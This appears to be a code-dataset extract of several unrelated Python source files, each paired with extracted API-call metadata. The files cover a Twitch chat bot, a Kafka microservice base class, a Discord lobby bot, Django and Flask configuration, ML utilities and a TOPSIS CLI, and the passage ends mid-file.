        out_file = f"{the_notebook.stem}_exec.ipynb"
        out_file = the_notebook.parent / out_file
        run_file(the_notebook,out_file)
        print(f"through with {out_file}")
        if out_file.is_file():
            print(f"wrote {out_file=}")
        else:
            print(f"can't find {out_file}")
| [
"click.argument",
"pathlib.Path",
"nbformat.read",
"nbformat.write",
"nbconvert.preprocessors.ExecutePreprocessor",
"click.command"
] | [((715, 730), 'click.command', 'click.command', ([], {}), '()\n', (728, 730), False, 'import click\n'), ((732, 775), 'click.argument', 'click.argument', (['"""notebook_folder"""'], {'type': 'str'}), "('notebook_folder', type=str)\n", (746, 775), False, 'import click\n'), ((776, 811), 'click.argument', 'click.argument', (['"""file_re"""'], {'type': 'str'}), "('file_re', type=str)\n", (790, 811), False, 'import click\n'), ((457, 487), 'nbformat.read', 'nbformat.read', (['f'], {'as_version': '(4)'}), '(f, as_version=4)\n', (470, 487), False, 'import nbformat\n'), ((501, 575), 'nbconvert.preprocessors.ExecutePreprocessor', 'ExecutePreprocessor', ([], {'timeout': '(600)', 'allow_errors': '(True)', 'kernel_name': '"""python3"""'}), "(timeout=600, allow_errors=True, kernel_name='python3')\n", (520, 575), False, 'from nbconvert.preprocessors import ExecutePreprocessor\n'), ((690, 711), 'nbformat.write', 'nbformat.write', (['nb', 'f'], {}), '(nb, f)\n', (704, 711), False, 'import nbformat\n'), ((867, 888), 'pathlib.Path', 'Path', (['notebook_folder'], {}), '(notebook_folder)\n', (871, 888), False, 'from pathlib import Path\n')] |
"""
Twitch bot
TODO ( Soon™ ):
* Check if user has mod/sub priviliges when using commands
* Fetch moderator-list for channels from Twitch
* Check that the bot actually connects to twitch and the channels on startup
* Move commands.py and blacklist.py to json or something for easier live editing?
* Make it so commands can take arguments
* Allow blacklist to contain regex
"""
import socket
import re
from time import sleep
from commands import commands
from config import config
from blacklist import blacklist
class TwitchBot():
    """Minimal Twitch IRC chat bot.

    Connects to Twitch chat over raw IRC, joins the configured channels,
    executes '!' commands and times out users who post blacklisted phrases.
    """

    def __init__(self):
        self.sock = socket.socket()

    def connect(self, channels):
        """Establish a connection with Twitch IRC and connect to channels"""
        if config['debug']:
            print("Connecting to Twitch")
        self.sock.connect((config['host'], config['port']))
        self.sock.send(f"PASS {config['oauth_pass']}\r\n".encode("utf-8"))
        self.sock.send(f"NICK {config['nick']}\r\n".encode("utf-8"))
        for channel in channels:
            self.join_channel(channel)

    def run(self):
        """Main loop: read from the socket and dispatch each message."""
        while True:
            response = self.sock.recv(1024).decode("utf-8")
            self.handle_message(response)
            sleep(2) # To prevent getting banned from sending to many messages (20 per 30sec)

    def join_channel(self, channel, greeting="/me has joined the channel"):
        self.sock.send(f"JOIN #{channel}\r\n".encode("utf-8"))
        self.send_message(greeting, channel)

    def respond_to_ping(self):
        self.sock.send("PONG :tmi.twitch.tv\r\n".encode("utf-8"))
        if config['debug']:
            print("Pinging server")

    def send_message(self, message, channel):
        """Sends a message to a Twitch channel"""
        self.sock.send(f"PRIVMSG #{channel} :{message}\r\n".encode("utf-8"))
        if config['debug']:
            print(f"OUT - {channel}: {message}")

    def handle_message(self, message):
        """Decide what to do with a message from server"""
        # BUG FIX: an IRC chat line looks like
        #   ':nick!nick@nick.tmi.twitch.tv PRIVMSG #channel :text'
        # The old code derived *both* user and channel from the nick prefix,
        # so replies went to '#<username>' instead of the actual channel.
        chat_message = re.compile(r"^:(\w+)!\w+@\w+\.tmi\.twitch\.tv PRIVMSG #(\w+) :")
        match = chat_message.match(message)
        if match:  # Message is from a chat
            user = match.group(1)
            channel = match.group(2)
            message = chat_message.sub("", message)[:-2]  # strip trailing \r\n
            res = self.check_blacklist(message, channel)
            if res[0] != -1:
                self.timeout_user(channel, user, res[0], res[1])
            elif message.startswith("!"):  # startswith avoids IndexError on empty text
                self.handle_commands(message[1::], channel, user)
        elif message == "PING :tmi.twitch.tv\r\n":
            self.respond_to_ping()

    def handle_commands(self, command, channel, username):
        """Execute a command"""
        user_auth_level = self.get_user_authority_level(channel, username)
        for group in ['global', channel]:
            for auth_level in user_auth_level:
                if command in commands[group][auth_level]:
                    self.send_message(commands[group][command], channel)

    def get_user_authority_level(self, channel, username):
        """Return the list of authority levels *username* holds on *channel*."""
        authority_levels = ['channelowner', 'mod', 'sub', 'all']
        if username == channel:
            return authority_levels
        # BUG FIX: return a one-element list instead of the bare string 'all',
        # which the caller would otherwise iterate character by character.
        return authority_levels[3:]

    def check_blacklist(self, message, channel):
        """Check if part of a message is blacklisted"""
        if channel in blacklist:
            for phrase in blacklist[channel]:
                if phrase in message:
                    return blacklist[channel][phrase]
        return [-1, '']

    def timeout_user(self, channel, username, time, timeout_message):
        if timeout_message:
            self.send_message(timeout_message, channel)
        self.send_message(f"/timeout {username} {time}", channel)
        if config['debug']:
            print(f"Timed out user {username} for {time} seconds.")
if __name__ == "__main__":
bot = TwitchBot()
bot.connect(config['channels'])
bot.run()
| [
"socket.socket",
"re.compile",
"re.match",
"time.sleep",
"re.search"
] | [((632, 647), 'socket.socket', 'socket.socket', ([], {}), '()\n', (645, 647), False, 'import socket\n'), ((2064, 2130), 're.compile', 're.compile', (['"""^:\\\\w+!\\\\w+@\\\\w+\\\\.tmi\\\\.twitch\\\\.tv PRIVMSG #\\\\w+ :"""'], {}), "('^:\\\\w+!\\\\w+@\\\\w+\\\\.tmi\\\\.twitch\\\\.tv PRIVMSG #\\\\w+ :')\n", (2074, 2130), False, 'import re\n'), ((2136, 2167), 're.match', 're.match', (['chat_message', 'message'], {}), '(chat_message, message)\n', (2144, 2167), False, 'import re\n'), ((1261, 1269), 'time.sleep', 'sleep', (['(2)'], {}), '(2)\n', (1266, 1269), False, 'from time import sleep\n'), ((2262, 2288), 're.search', 're.search', (['"""\\\\w+"""', 'message'], {}), "('\\\\w+', message)\n", (2271, 2288), False, 'import re\n')] |
from abc import ABC, abstractmethod
from kafka import KafkaProducer
from kafka import KafkaConsumer
import logging as logger
import json
import os
# One consistent log line format for the whole service.
logger.basicConfig(format='%(asctime)s|[%(levelname)s]|File:%(filename)s|'
                          'Function:%(funcName)s|Line:%(lineno)s|%(message)s')
# Default pipeline configuration, taken from the environment.  Empty strings
# mark missing values; verify_env() aborts the service if any remain empty.
default_config = {"KAFKA_SOURCE_BOOTSTRAP_SERVERS": os.environ.get("KAFKA_SOURCE_BOOTSTRAP_SERVERS",
                                                                   ''),
                  "KAFKA_SOURCE_TOPIC": os.environ.get('KAFKA_SOURCE_TOPIC', ''),
                  "KAFKA_TARGET_BOOTSTRAP_SERVERS": os.environ.get("KAFKA_TARGET_BOOTSTRAP_SERVERS",
                                                                   ''),
                  "KAFKA_TARGET_TOPIC": os.environ.get('KAFKA_TARGET_TOPIC', ''),
                  "MODULE_NAME": os.environ.get('MODULE_NAME', ''),
                  "CONSUMER_GROUP": os.environ.get("CONSUMER_GROUP", '')}
""" Base Class for pipeline module """
class StreamProcessMicroService(ABC):
    """Base class for a Kafka stream-processing microservice.

    Subclasses implement process_message(); start_service() then consumes the
    source topic, processes each record and publishes the result to the target
    topic (or to the topic the subclass returns alongside the message).
    """

    @staticmethod
    def forgiving_json_deserializer(v):
        # Returns None instead of raising for empty or malformed payloads so a
        # single bad record cannot kill the consumer loop.
        if v is None:
            return
        try:
            return json.loads(v.decode('utf-8'))
        except json.decoder.JSONDecodeError:
            logger.error('Unable to decode: %s', v)
            return None

    def __init__(self, new_config):
        # new_config overrides the environment-derived defaults key by key.
        self.config = {**default_config, **new_config}
        self.verify_env()
        logger.info("Connecting to Kafka Consumer bootstrap server")
        self.consumer_client = KafkaConsumer(self.config.get("KAFKA_SOURCE_TOPIC"),
                                             group_id=self.config.get("CONSUMER_GROUP"),
                                             bootstrap_servers=self.config.get("KAFKA_SOURCE_BOOTSTRAP_SERVERS").split(
                                                 ","),
                                             value_deserializer=lambda v: self.forgiving_json_deserializer(v))
        logger.info("Connecting to Kafka Producer bootstrap server")
        self.producer_client = KafkaProducer(
            bootstrap_servers=self.config.get("KAFKA_TARGET_BOOTSTRAP_SERVERS").split(","),
            value_serializer=lambda v: json.dumps(v).encode('utf-8'))
        self.target_topic = self.config.get("KAFKA_TARGET_TOPIC")

    def verify_env(self):
        """Exit with status 1 if any configuration value is blank/missing."""
        verification_failed = False
        for key, value in self.config.items():
            if not str.strip(value):
                verification_failed = True
                logger.error(f"Environment variable '{key}' not set.")
        if verification_failed:
            quit(1)

    def get_producer_client(self):
        return self.producer_client

    def get_consumer_client(self):
        return self.consumer_client

    @abstractmethod
    def process_message(self, message):
        """ Abstract Method. Override this to process the message.

        May return: a message (published to the target topic), a tuple of
        (message, topic) to override the destination, or a falsy value to
        drop the record. """
        raise NotImplementedError('Implement me in subclass')

    def kafka_pipeline_service(self):
        """ Skeleton of operations to perform. DON'T override """
        print("Starting consumer")
        for message in self.consumer_client:
            processed_message = self.process_message(message)
            if processed_message and type(processed_message) is not tuple:
                self.producer_client.send(self.target_topic, processed_message)
            elif processed_message and type(processed_message) is tuple and len(processed_message) >= 2:
                # A tuple (message, topic); topic None falls back to the default.
                target_publishing_topic = self.target_topic if processed_message[1] is None else processed_message[1]
                self.producer_client.send(target_publishing_topic, processed_message[0])

    def start_service(self):
        self.kafka_pipeline_service()
| [
"logging.basicConfig",
"json.dumps",
"os.environ.get",
"logging.info",
"logging.error"
] | [((148, 282), 'logging.basicConfig', 'logger.basicConfig', ([], {'format': '"""%(asctime)s|[%(levelname)s]|File:%(filename)s|Function:%(funcName)s|Line:%(lineno)s|%(message)s"""'}), "(format=\n '%(asctime)s|[%(levelname)s]|File:%(filename)s|Function:%(funcName)s|Line:%(lineno)s|%(message)s'\n )\n", (166, 282), True, 'import logging as logger\n'), ((355, 407), 'os.environ.get', 'os.environ.get', (['"""KAFKA_SOURCE_BOOTSTRAP_SERVERS"""', '""""""'], {}), "('KAFKA_SOURCE_BOOTSTRAP_SERVERS', '')\n", (369, 407), False, 'import os\n'), ((516, 556), 'os.environ.get', 'os.environ.get', (['"""KAFKA_SOURCE_TOPIC"""', '""""""'], {}), "('KAFKA_SOURCE_TOPIC', '')\n", (530, 556), False, 'import os\n'), ((610, 662), 'os.environ.get', 'os.environ.get', (['"""KAFKA_TARGET_BOOTSTRAP_SERVERS"""', '""""""'], {}), "('KAFKA_TARGET_BOOTSTRAP_SERVERS', '')\n", (624, 662), False, 'import os\n'), ((771, 811), 'os.environ.get', 'os.environ.get', (['"""KAFKA_TARGET_TOPIC"""', '""""""'], {}), "('KAFKA_TARGET_TOPIC', '')\n", (785, 811), False, 'import os\n'), ((846, 879), 'os.environ.get', 'os.environ.get', (['"""MODULE_NAME"""', '""""""'], {}), "('MODULE_NAME', '')\n", (860, 879), False, 'import os\n'), ((917, 953), 'os.environ.get', 'os.environ.get', (['"""CONSUMER_GROUP"""', '""""""'], {}), "('CONSUMER_GROUP', '')\n", (931, 953), False, 'import os\n'), ((1444, 1504), 'logging.info', 'logger.info', (['"""Connecting to Kafka Consumer bootstrap server"""'], {}), "('Connecting to Kafka Consumer bootstrap server')\n", (1455, 1504), True, 'import logging as logger\n'), ((1972, 2032), 'logging.info', 'logger.info', (['"""Connecting to Kafka Producer bootstrap server"""'], {}), "('Connecting to Kafka Producer bootstrap server')\n", (1983, 2032), True, 'import logging as logger\n'), ((1254, 1293), 'logging.error', 'logger.error', (['"""Unable to decode: %s"""', 'v'], {}), "('Unable to decode: %s', v)\n", (1266, 1293), True, 'import logging as logger\n'), ((2513, 2567), 'logging.error', 
'logger.error', (['f"""Environment variable \'{key}\' not set."""'], {}), '(f"Environment variable \'{key}\' not set.")\n', (2525, 2567), True, 'import logging as logger\n'), ((2210, 2223), 'json.dumps', 'json.dumps', (['v'], {}), '(v)\n', (2220, 2223), False, 'import json\n')] |
#!/usr/local/bin/python3
import discord
import asyncio
import core.battle_lobby as battle_lobby
from core.common import SERVSET
CLIENT = discord.Client()
@CLIENT.event
async def on_ready():
    # Fired once the gateway connection is ready; bootstraps the lobby loop.
    print ('Logged in as '+CLIENT.user.name)
    await setup_battle_lobby()

@CLIENT.event
async def on_reaction_add(reaction, user):
    # Placeholder: reactions are currently ignored.
    pass
async def setup_battle_lobby():
    """Wire up the #battle_lobby channel: install the message handler, post
    the help message, and keep per-player status embeds in sync forever."""
    @CLIENT.event
    async def on_message(message):
        # Only '//' commands are processed; all other user messages are
        # deleted to keep the lobby channel clean.
        if not message.channel.name == 'battle_lobby':
            return
        if message.content.startswith('//'):
            BTLLOB.cmdparse(message)
            await message.delete()
        else:
            if message.author != CLIENT.user:
                await message.delete()
    G = CLIENT.get_guild(SERVSET['server']['id'])
    # Locate the battle_lobby channel inside the 'Onzozo' category.
    for category in G.categories:
        if category.name == 'Onzozo':
            C = category
    for chan in C.channels:
        if chan.name == 'battle_lobby':
            BTLLOBCHAN = chan
    BTLLOB = battle_lobby.battle_lobby()
    await BTLLOBCHAN.purge()
    TOPMSG = await BTLLOBCHAN.send(embed=BTLLOB.top_help_msg())
    # Refresh loop: edit existing status embeds in place, delete stale ones,
    # then post embeds for players that have no message yet.
    while True:
        STATUS = BTLLOB.get_lobby_status()
        async for msg in BTLLOBCHAN.history():
            try:
                PID = msg.embeds[0].author.name.split(' ')[0]
            # NOTE(review): a message with no embeds raises IndexError here and
            # leaves PID unbound on the first iteration -- verify.
            except (ValueError, IndexError):
                pass
            if PID not in STATUS.keys():
                if not msg.id == TOPMSG.id:
                    await msg.delete()
            elif PID in STATUS.keys():
                print (PID)
                await msg.edit(embed=STATUS.pop(PID))
        for pid, emb in STATUS.items():
            await BTLLOBCHAN.send(embed=STATUS[pid])
        await asyncio.sleep(2)
def main():
    # The token file is expected to hold the bot token; the last line wins.
    for line in open(SERVSET['tokenfile'], 'r'):
        TOKEN = line.rstrip('\n')
    CLIENT.run(TOKEN)

if __name__ == '__main__':
    main()
| [
"discord.Client",
"core.battle_lobby.battle_lobby",
"asyncio.sleep"
] | [((139, 155), 'discord.Client', 'discord.Client', ([], {}), '()\n', (153, 155), False, 'import discord\n'), ((972, 999), 'core.battle_lobby.battle_lobby', 'battle_lobby.battle_lobby', ([], {}), '()\n', (997, 999), True, 'import core.battle_lobby as battle_lobby\n'), ((1704, 1720), 'asyncio.sleep', 'asyncio.sleep', (['(2)'], {}), '(2)\n', (1717, 1720), False, 'import asyncio\n')] |
"""
Blueprint for hello world.
"""
from flask import Blueprint
from flask_login import login_required
BP = Blueprint('main', __name__)
@BP.route('/')
@BP.route('/index')
@login_required
def index():
    """
    Say hello.  Only reachable by authenticated users (login_required).

    :return: A greeting.
    :rtype: str
    """
    return "Hello, world"
| [
"flask.Blueprint"
] | [((109, 136), 'flask.Blueprint', 'Blueprint', (['"""main"""', '__name__'], {}), "('main', __name__)\n", (118, 136), False, 'from flask import Blueprint\n')] |
# Generated by Django 3.1 on 2021-04-30 18:27
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated: drops the old alert timestamp index, strips the
    # redundant 'alert_'/'event_' prefixes from several fields, and recreates
    # the timestamp index under the new field name.

    dependencies = [
        ('skip', '0011_auto_20210430_1746'),
    ]

    operations = [
        migrations.RemoveIndex(
            model_name='alert',
            name='alert_timestamp_idx',
        ),
        migrations.RenameField(
            model_name='alert',
            old_name='alert_identifier',
            new_name='identifier',
        ),
        migrations.RenameField(
            model_name='alert',
            old_name='alert_timestamp',
            new_name='timestamp',
        ),
        migrations.RenameField(
            model_name='event',
            old_name='event_identifier',
            new_name='identifier',
        ),
        migrations.AddIndex(
            model_name='alert',
            index=models.Index(fields=['timestamp'], name='timestamp_idx'),
        ),
    ]
| [
"django.db.migrations.RemoveIndex",
"django.db.models.Index",
"django.db.migrations.RenameField"
] | [((230, 300), 'django.db.migrations.RemoveIndex', 'migrations.RemoveIndex', ([], {'model_name': '"""alert"""', 'name': '"""alert_timestamp_idx"""'}), "(model_name='alert', name='alert_timestamp_idx')\n", (252, 300), False, 'from django.db import migrations, models\n'), ((345, 443), 'django.db.migrations.RenameField', 'migrations.RenameField', ([], {'model_name': '"""alert"""', 'old_name': '"""alert_identifier"""', 'new_name': '"""identifier"""'}), "(model_name='alert', old_name='alert_identifier',\n new_name='identifier')\n", (367, 443), False, 'from django.db import migrations, models\n'), ((496, 592), 'django.db.migrations.RenameField', 'migrations.RenameField', ([], {'model_name': '"""alert"""', 'old_name': '"""alert_timestamp"""', 'new_name': '"""timestamp"""'}), "(model_name='alert', old_name='alert_timestamp',\n new_name='timestamp')\n", (518, 592), False, 'from django.db import migrations, models\n'), ((645, 743), 'django.db.migrations.RenameField', 'migrations.RenameField', ([], {'model_name': '"""event"""', 'old_name': '"""event_identifier"""', 'new_name': '"""identifier"""'}), "(model_name='event', old_name='event_identifier',\n new_name='identifier')\n", (667, 743), False, 'from django.db import migrations, models\n'), ((867, 923), 'django.db.models.Index', 'models.Index', ([], {'fields': "['timestamp']", 'name': '"""timestamp_idx"""'}), "(fields=['timestamp'], name='timestamp_idx')\n", (879, 923), False, 'from django.db import migrations, models\n')] |
import math
import random
class BatchIterCANTM:
    """Batch iterator that groups items from a dict-yielding iterator.

    Each item from ``dataIter`` must be a dict; a batch is a dict mapping each
    key to the list of values collected from up to ``batch_size`` items.  With
    ``filling_last_batch`` the final short batch is padded with items sampled
    (reservoir-style) from earlier in the stream.
    """

    def __init__(self, dataIter, batch_size=32, filling_last_batch=False, postProcessor=None):
        # dataIter must support both len() (to size the epoch) and next().
        self.dataIter = dataIter
        self.batch_size = batch_size
        self.num_batches = self._get_num_batches()
        self.filling_last_batch = filling_last_batch
        self.postProcessor = postProcessor
        self.fillter = []  # reservoir of seen items used to pad the last batch
        self._reset_iter()

    def _get_num_batches(self):
        return math.ceil(len(self.dataIter) / self.batch_size)

    def _reset_iter(self):
        self.current_batch_idx = 0

    def __iter__(self):
        self._reset_iter()
        return self

    def __next__(self):
        if self.current_batch_idx < self.num_batches:
            current_batch = self._readNextBatch()
            self.current_batch_idx += 1
            if self.postProcessor:
                return self.postProcessor(current_batch)
            return current_batch
        self._reset_iter()
        raise StopIteration

    def __len__(self):
        return self.num_batches

    @staticmethod
    def _append_item(batch_dict, each_item_dict):
        # Append every field of one item to the column lists of the batch.
        for reader_item_key in each_item_dict:
            if reader_item_key in batch_dict:
                batch_dict[reader_item_key].append(each_item_dict[reader_item_key])
            else:
                batch_dict[reader_item_key] = [each_item_dict[reader_item_key]]

    def _readNextBatch(self):
        """Collect up to batch_size items into a single column-wise dict."""
        i = 0
        batch_dict = {}
        while i < self.batch_size:
            try:
                each_item_dict = next(self.dataIter)
                if self.filling_last_batch:
                    self._update_fillter(each_item_dict)
                self._append_item(batch_dict, each_item_dict)
                i += 1
            except StopIteration:
                if self.filling_last_batch:
                    batch_dict = self._filling_last_batch(batch_dict, i)
                i = self.batch_size  # end the while loop; partial batch is returned
        return batch_dict

    def _filling_last_batch(self, batch_dict, num_current_batch):
        """Pad a short final batch with random previously-seen items."""
        num_filling = self.batch_size - num_current_batch
        random.shuffle(self.fillter)
        # Guard against a reservoir smaller than the number of missing items
        # (e.g. a dataset shorter than one batch); the old code raised IndexError.
        for filler_id in range(min(num_filling, len(self.fillter))):
            self._append_item(batch_dict, self.fillter[filler_id])
        return batch_dict

    def _update_fillter(self, each_item_dict):
        # Reservoir-style update of the padding pool (capacity == batch_size).
        r = random.random()
        if len(self.fillter) < self.batch_size:
            self.fillter.append(each_item_dict)
        elif r > 0.9:
            self.fillter.pop(0)
            self.fillter.append(each_item_dict)
| [
"random.random",
"random.shuffle"
] | [((2085, 2113), 'random.shuffle', 'random.shuffle', (['self.fillter'], {}), '(self.fillter)\n', (2099, 2113), False, 'import random\n'), ((2593, 2608), 'random.random', 'random.random', ([], {}), '()\n', (2606, 2608), False, 'import random\n')] |
from importlib import import_module
from django.conf import settings
from django.conf.urls import include, url
from django.core.exceptions import ImproperlyConfigured
from tastypie.api import Api
from .api import TemporaryFileResource, ServiceResource, VariableResource
from .views import TemporaryFileUploadFormView, TemporaryFileUploadUrlView, TemporaryFileDownloadView
DEFAULT_INSTALLED_INTERFACES = (
    'ncdjango.interfaces.data',
    'ncdjango.interfaces.arcgis_extended',
    'ncdjango.interfaces.arcgis'
)

# Projects may override the interface list via settings.NC_INSTALLED_INTERFACES.
INSTALLED_INTERFACES = getattr(settings, 'NC_INSTALLED_INTERFACES', DEFAULT_INSTALLED_INTERFACES)

app_name = 'ncdjango'

urlpatterns = []

# Collect the urlpatterns of every installed interface; a misconfigured
# interface fails fast at import time.
for interface in INSTALLED_INTERFACES:
    try:
        module = import_module("{}.urls".format(interface))
    except (ImportError, TypeError):
        raise ImproperlyConfigured("Can't find ncdjango interface: {}".format(interface))

    try:
        urlpatterns += getattr(module, 'urlpatterns')
    except AttributeError:
        raise ImproperlyConfigured("Interface URLs file has no urlpatterns")

# Tastypie admin API exposing temporary files, services and variables.
api = Api(api_name="admin")
api.register(TemporaryFileResource())
api.register(ServiceResource())
api.register(VariableResource())

urlpatterns += [
    url(r'^api/admin/upload-by-url/$', TemporaryFileUploadUrlView.as_view(), name='nc_admin_upload_by_url'),
    url(r'^api/admin/upload/$', TemporaryFileUploadFormView.as_view(), name='nc_admin_upload'),
    url(r'^api/admin/download/(?P<uuid>[0-9\w\-]+)/$', TemporaryFileDownloadView.as_view(), name='nc_admin_download'),
    url(r'^api/', include(api.urls)),
    url(r'^geoprocessing/', include('ncdjango.geoprocessing.urls'))
]
| [
"django.conf.urls.include",
"django.core.exceptions.ImproperlyConfigured",
"tastypie.api.Api"
] | [((1068, 1089), 'tastypie.api.Api', 'Api', ([], {'api_name': '"""admin"""'}), "(api_name='admin')\n", (1071, 1089), False, 'from tastypie.api import Api\n'), ((1553, 1570), 'django.conf.urls.include', 'include', (['api.urls'], {}), '(api.urls)\n', (1560, 1570), False, 'from django.conf.urls import include, url\n'), ((1601, 1639), 'django.conf.urls.include', 'include', (['"""ncdjango.geoprocessing.urls"""'], {}), "('ncdjango.geoprocessing.urls')\n", (1608, 1639), False, 'from django.conf.urls import include, url\n'), ((998, 1060), 'django.core.exceptions.ImproperlyConfigured', 'ImproperlyConfigured', (['"""Interface URLs file has no urlpatterns"""'], {}), "('Interface URLs file has no urlpatterns')\n", (1018, 1060), False, 'from django.core.exceptions import ImproperlyConfigured\n')] |
__all__ = [
"Embedding"
]
import torch.nn as nn
from ..utils import get_embeddings
class Embedding(nn.Embedding):
    """
    Alias :class:`fastNLP.modules.Embedding` :class:`fastNLP.modules.encoder.embedding.Embedding`

    Embedding component.  ``self.num_embeddings`` gives the vocabulary size;
    ``self.embedding_dim`` gives the embedding dimension."""
    
    def __init__(self, init_embed, padding_idx=None, dropout=0.0, sparse=False, max_norm=None, norm_type=2,
                 scale_grad_by_freq=False):
        """
        :param tuple(int,int),torch.FloatTensor,nn.Embedding,numpy.ndarray init_embed: size of the embedding
            as a tuple(int, int) of (vocab_size, embed_dim); a Tensor, Embedding or ndarray is instead used
            directly to initialise the embedding weights.
        :param None,int padding_idx: the embedding at this index is kept at zero.
        :param float dropout: dropout applied to the embedding output.
        :param bool sparse: if True, gradients w.r.t. the weight matrix are sparse (see the PyTorch
            Embedding documentation for details).
        :param None,float max_norm: maximum norm allowed for each embedding vector.
        :param int norm_type: the p of the p-norm used with max_norm.
        :param bool scale_grad_by_freq: if True, scale gradients by the inverse word frequency.
        """
        embed = get_embeddings(init_embed)
        num_embeddings, embedding_dim = embed.weight.size()
        super().__init__(num_embeddings, embedding_dim, padding_idx=padding_idx,
                         max_norm=max_norm, norm_type=norm_type, scale_grad_by_freq=scale_grad_by_freq,
                         sparse=sparse, _weight=embed.weight.data)
        # The weight data has been handed to the parent; drop the temporary.
        del embed
        self.dropout = nn.Dropout(dropout)
    
    def forward(self, x):
        """
        :param torch.LongTensor x: [batch, seq_len]
        :return: torch.Tensor : [batch, seq_len, embed_dim]
        """
        x = super().forward(x)
        return self.dropout(x)
    
    def size(self):
        """
        Size of the embedding weight matrix.

        :return: torch.Size()
        """
        return self.weight.size()
| [
"torch.nn.Dropout"
] | [((1483, 1502), 'torch.nn.Dropout', 'nn.Dropout', (['dropout'], {}), '(dropout)\n', (1493, 1502), True, 'import torch.nn as nn\n')] |
import base64
import io
from matplotlib import pyplot
import numpy as np
import rasterio
def read_raster_file(input_fn, band = 1):
    """Read one band of a raster file into an array.

    :param input_fn: path to a raster file readable by rasterio
    :param band: 1-based band index
    """
    with rasterio.open(input_fn) as src:
        return src.read(band)
def plot_raster_layer(input_fn, band = 1, from_logits = True):
    """Display one raster band with the viridis colormap.

    :param from_logits: if True, exponentiate the (log-space) data before
        plotting.
    """
    pyplot.figure(figsize = (10,10))
    data = read_raster_file(input_fn, band)
    if from_logits:
        data = np.exp(data)
    pyplot.imshow(data, cmap='viridis')
    pyplot.show()
def plot_histogram(input_fn, band = 1, from_logits = True):
    """Plot a histogram of the rounded raster values of one band.

    :param from_logits: if True, exponentiate the (log-space) data before
        plotting.  BUG FIX: this flag was previously silently ignored,
        unlike in plot_raster_layer.
    """
    pyplot.figure(figsize = (10,10))
    data = read_raster_file(input_fn, band)
    if from_logits:
        data = np.exp(data)
    pyplot.hist(np.rint(data), bins='auto')
    pyplot.show()
def get_base64_image(input_fn, band = 1, from_logits = True):
    """Render one raster band with the viridis colormap and return the PNG
    image as a base64 string.

    :param from_logits: if True, exponentiate the (log-space) data before
        rendering.  BUG FIX: this flag was previously silently ignored,
        unlike in plot_raster_layer.
    """
    pyplot.figure(figsize = (10,10))
    data = read_raster_file(input_fn, band)
    if from_logits:
        data = np.exp(data)
    pyplot.imshow(data, cmap='viridis')
    pic_IObytes = io.BytesIO()
    pyplot.savefig(pic_IObytes, format='png')
    pic_IObytes.seek(0)
    # base64 output is pure ASCII; decode() replaces the old str(bytes)[2:-1]
    # hack with the same result.
    pic_hash = base64.b64encode(pic_IObytes.read()).decode('ascii')
    pyplot.close()
    return pic_hash
| [
"matplotlib.pyplot.imshow",
"matplotlib.pyplot.savefig",
"rasterio.open",
"io.BytesIO",
"matplotlib.pyplot.close",
"numpy.exp",
"matplotlib.pyplot.figure",
"numpy.rint",
"matplotlib.pyplot.show"
] | [((278, 309), 'matplotlib.pyplot.figure', 'pyplot.figure', ([], {'figsize': '(10, 10)'}), '(figsize=(10, 10))\n', (291, 309), False, 'from matplotlib import pyplot\n'), ((407, 442), 'matplotlib.pyplot.imshow', 'pyplot.imshow', (['data'], {'cmap': '"""viridis"""'}), "(data, cmap='viridis')\n", (420, 442), False, 'from matplotlib import pyplot\n'), ((447, 460), 'matplotlib.pyplot.show', 'pyplot.show', ([], {}), '()\n', (458, 460), False, 'from matplotlib import pyplot\n'), ((531, 562), 'matplotlib.pyplot.figure', 'pyplot.figure', ([], {'figsize': '(10, 10)'}), '(figsize=(10, 10))\n', (544, 562), False, 'from matplotlib import pyplot\n'), ((657, 670), 'matplotlib.pyplot.show', 'pyplot.show', ([], {}), '()\n', (668, 670), False, 'from matplotlib import pyplot\n'), ((739, 770), 'matplotlib.pyplot.figure', 'pyplot.figure', ([], {'figsize': '(10, 10)'}), '(figsize=(10, 10))\n', (752, 770), False, 'from matplotlib import pyplot\n'), ((820, 855), 'matplotlib.pyplot.imshow', 'pyplot.imshow', (['data'], {'cmap': '"""viridis"""'}), "(data, cmap='viridis')\n", (833, 855), False, 'from matplotlib import pyplot\n'), ((875, 887), 'io.BytesIO', 'io.BytesIO', ([], {}), '()\n', (885, 887), False, 'import io\n'), ((892, 933), 'matplotlib.pyplot.savefig', 'pyplot.savefig', (['pic_IObytes'], {'format': '"""png"""'}), "(pic_IObytes, format='png')\n", (906, 933), False, 'from matplotlib import pyplot\n'), ((1104, 1118), 'matplotlib.pyplot.close', 'pyplot.close', ([], {}), '()\n', (1116, 1118), False, 'from matplotlib import pyplot\n'), ((143, 166), 'rasterio.open', 'rasterio.open', (['input_fn'], {}), '(input_fn)\n', (156, 166), False, 'import rasterio\n'), ((390, 402), 'numpy.exp', 'np.exp', (['data'], {}), '(data)\n', (396, 402), True, 'import numpy as np\n'), ((624, 637), 'numpy.rint', 'np.rint', (['data'], {}), '(data)\n', (631, 637), True, 'import numpy as np\n')] |
def main():
    """TOPSIS CLI: read a decision matrix CSV, validate weights/impacts from
    argv, and write the input plus 'TOPSIS Score' and 'Rank' columns to the
    output CSV.

    Usage: topsis <inputDataFile> <weights> <impacts> <outputFileName>
    """
    import pandas as pd
    import sys
    # --- argument and input validation ------------------------------------
    if len(sys.argv) != 5:
        sys.exit("Error: Incorrect Number of arguments\nDesired Syntax: topsis <inputDataFile> <weights> <impacts> <outputFileName>")
    try:
        df = pd.read_csv(sys.argv[1])
    except:
        sys.exit("Error: File not Found! Make sure the file is saved in the current working directory.")
    if len(df.columns) < 3:
        sys.exit("Error: Input file must contain three or more columns")
    if df.shape[1] != df.select_dtypes(include=["float", 'int']).shape[1]+1:
        sys.exit("Error: From 2nd to last columns must contain numeric values only")
    if df.isnull().sum().sum() != 0:
        sys.exit("Error: Input file contains NULL values!")
    try:
        weights = list(map(float, sys.argv[2].split(',')))
    except ValueError:
        sys.exit("Error: Weights must be numeric only")
    if len(weights) != len(df.columns)-1:
        sys.exit(
            f"Error: Incorrect number of weights! Pass only {len(df.columns)-1} weights\nMake sure weights are separated by ',' (comma)")
    impacts = sys.argv[3].split(',')
    if len(impacts) != len(df.columns)-1:
        sys.exit(
            f"Error: Incorrect number of impacts! Pass only {len(df.columns)-1} impacts\nMake sure impacts are separated by ',' (comma)")
    if any(i not in ['+', '-'] for i in impacts):
        sys.exit("Error: Impacts must be either '+' or '-'")
    # '+' (benefit criterion) -> 1, '-' (cost criterion) -> -1.
    impacts = list(map(lambda x: 1 if x == '+' else -1, impacts))
    if sys.argv[4][-4:] != '.csv':
        sys.exit("Error: Output file must contain .csv extension")
